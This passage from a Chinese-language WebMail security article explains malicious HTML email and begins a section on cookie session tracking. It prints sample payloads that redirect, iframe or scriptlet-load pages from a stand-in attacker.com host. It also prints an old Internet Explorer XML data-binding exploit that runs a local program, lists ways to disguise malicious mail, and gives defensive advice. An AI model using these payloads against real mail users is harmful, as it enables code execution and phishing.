(1) Refresh到另一個(gè)頁(yè)面：

＜body＞
＜meta http-equiv="refresh" content="1；URL=http://www.attacker.com/another.htm"＞
＜/body＞

　　(2) Iframe引入另一個(gè)頁(yè)面：

＜body＞
＜iframe src="http://www.attacker.com/import.htm" frameborder="0"＞＜/iframe＞
＜/body＞

　　(3) scriptlet引入另一個(gè)頁(yè)面：

＜body＞
＜o(jì)bject type="text/x-scriptlet" data="http://www.attacker.com/import.htm"＞＜/object＞
＜/body＞

　　攻擊者還可以采取如下方法，使帶有惡性代碼的html郵件具有更大的隱蔽性：

　　(1) 配合郵件欺騙技術(shù)，使用戶(hù)不會(huì)懷疑收到的郵件，并且攻擊者也能隱藏自己的行蹤。

　　(2) 把html郵件設(shè)計(jì)成看起來(lái)像txt郵件。

　　(3) 有時(shí)可以把html郵件中的惡性代碼放在一個(gè)隱藏的層里面，表面上看不出任何變化。

　　針對(duì)惡性腳本程序的影響，對(duì)用戶(hù)常見(jiàn)的建議辦法是提高瀏覽器的安全級(jí)別，如禁用ActiveX、禁用腳本等，但這并不是一個(gè)很好的辦法，因?yàn)檫@樣會(huì)影響到用戶(hù)對(duì)其他正常html頁(yè)面的瀏覽。即使瀏覽器達(dá)到了最高級(jí)別，依然對(duì)某些惡性代碼無(wú)濟(jì)于事，下面是位以色列安全專(zhuān)家發(fā)現(xiàn)的漏洞，能讓W(xué)indows系統(tǒng)自動(dòng)執(zhí)行任何本地程序，即使Internet Explorer已經(jīng)禁止了ActiveX和腳本程序：

＜span datasrc="#oExec" datafld="exploit" dataformatas="html"＞＜/span＞

＜xml id="oExec"＞
＜security＞
＜exploit＞
＜![CDATA[
＜o(jì)bject id="oFile" classid="clsid:11111111-1111-1111-1111-
111111111111" codebase="c:/winnt/system32/calc.exe"＞＜/object＞
]]＞
＜/exploit＞
＜/security＞
＜/xml＞

　　面對(duì)惡性html郵件，WebMail系統(tǒng)和用戶(hù)似乎都沒(méi)有很好的解決辦法，雖然許多WebMail系統(tǒng)已經(jīng)能夠過(guò)濾掉html郵件中的很多惡性代碼，不過(guò)令人遺憾的是，要想徹底過(guò)濾掉惡性代碼并不是一件容易的事情，攻擊者總能利用WebMail系統(tǒng)過(guò)濾機(jī)制和瀏覽器的漏洞找到辦法繞過(guò)種種過(guò)濾，WebMail系統(tǒng)所能做的就是發(fā)現(xiàn)一個(gè)漏洞補(bǔ)一個(gè)漏洞。

　　為了減少乃至避免惡性html郵件的影響，在打開(kāi)html郵件之前，WebMail系統(tǒng)有必要提醒用戶(hù)這是一個(gè)html郵件，如果能提供讓用戶(hù)以文本方式瀏覽html郵件的功能，則是最好不過(guò)。在打開(kāi)不明郵件之前，用戶(hù)更要小心謹(jǐn)慎，最好把html郵件“目標(biāo)另存為”到本地硬盤(pán)上再打開(kāi)來(lái)看，如果能先查看html郵件源代碼，則是最好不過(guò)。

　　另外需要特別提醒用戶(hù)注意的是，雖然一些電子郵件系統(tǒng)會(huì)在WebMail系統(tǒng)上對(duì)html郵件中的惡性代碼進(jìn)行過(guò)濾，但在pop3服務(wù)器上并不會(huì)進(jìn)行過(guò)濾，所以，如果是通過(guò)郵件客戶(hù)端收取郵件，仍然要謹(jǐn)防惡性html郵件的危害。

　　五、Cookie會(huì)話(huà)攻擊

　　當(dāng)用戶(hù)以自已的郵箱帳戶(hù)和密碼登錄進(jìn)WebMail以后，如果再讓用戶(hù)對(duì)每一步操作都輸入密碼加以確認(rèn)就會(huì)讓人不甚其煩。所以WebMail系統(tǒng)有必要進(jìn)行用戶(hù)會(huì)話(huà)跟蹤，WebMail系統(tǒng)用到的會(huì)話(huà)跟蹤技術(shù)主要有兩種：cookie會(huì)話(huà)跟蹤和URL會(huì)話(huà)跟蹤。

　　Cookie是web服務(wù)器保存在用戶(hù)瀏覽器上的文本信息，可以包含用戶(hù)名、特殊ID、訪(fǎng)問(wèn)次數(shù)等任何信息，通常此信息用于標(biāo)識(shí)訪(fǎng)問(wèn)同一web服務(wù)器上的不同用戶(hù)，在瀏覽器每次訪(fǎng)問(wèn)同一web服務(wù)器時(shí)會(huì)發(fā)送過(guò)去，用于跟蹤特定客戶(hù)端或?yàn)g覽器與Web服務(wù)器進(jìn)行交互的狀態(tài)。

　　Cookie的類(lèi)型有兩種：持久型和臨時(shí)型。持久型cookie以文本形式存儲(chǔ)在硬盤(pán)上，由瀏覽器存取。使用了持久型cookie會(huì)話(huà)跟蹤的WebMail系統(tǒng)有hotmail、yahoo電郵（可選）等。臨時(shí)型cookie也稱(chēng)為會(huì)話(huà)cookie，存儲(chǔ)在內(nèi)存中，僅為當(dāng)前瀏覽器的對(duì)話(huà)存儲(chǔ)，關(guān)閉當(dāng)前瀏覽器后會(huì)立即消失，ASP、PHP4等開(kāi)發(fā)程序中用到的session對(duì)象就會(huì)產(chǎn)生臨時(shí)型cookie。使用了臨時(shí)型cookie會(huì)話(huà)跟蹤的WebMail系統(tǒng)有FM365、億郵等。